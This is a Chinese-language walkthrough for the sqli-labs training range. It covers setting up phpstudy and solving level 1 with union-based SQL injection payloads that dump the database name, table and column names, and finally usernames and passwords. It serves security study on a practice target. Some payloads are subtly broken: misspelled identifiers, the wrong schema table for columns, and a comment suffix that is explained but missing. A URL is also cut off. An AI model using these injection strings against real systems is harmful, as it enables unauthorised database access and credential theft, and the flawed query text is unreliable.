-
环境准备:* 1.1、安装phpstudy软件,网址如下,安装后如下图1.1
https://www.xp.cn/
1.2、下载sqli-lab的压缩文件包,压缩后放在phpstudy的www文件夹内(若不知道路径的可以在phpstudy下的网站一栏中选择,则可以看到文件的绝对路径) 1.3、打开网站,按照首页提示初始化靶场(这里注意在phpstudy中将php版本号调至php5左右,网站->管理->php版本) 1.4、安装完成后,即可使用sqli-lab靶场了
2.level1 1、打开sqli靶场 2、此时我们可以进行sql注入的尝试
http:
报错如下:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1
我们知道正常情况下该语句应该为
select * from ... where id=1
那么我们可以用联合查询的方式来查询一下数据库名
?id=-1' union select 1,2,database()
注:之所以最后要加–+是因为–在sql语句中表示注释,同时+代表空格,而注释后一定有空格才可以成立,不然会报错
继续进行sql注入,这回通过构建语句来查询表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
原理跟之前几乎完全一样,不一样的是这回我们爆的是user这个表里的字段
?id=-1' union select 1,2,group_concat(columns_name) from informatio_schema.tables
where table_name='users'
最后我们可以直接爆账户名和密码了
?id=-1' union select 1,2,group_concat(username,0x3a,password) from users
注:这里的0x3a是冒号:的十六进制表示,也可以用其他字符代替,仅用于隔开username和password
|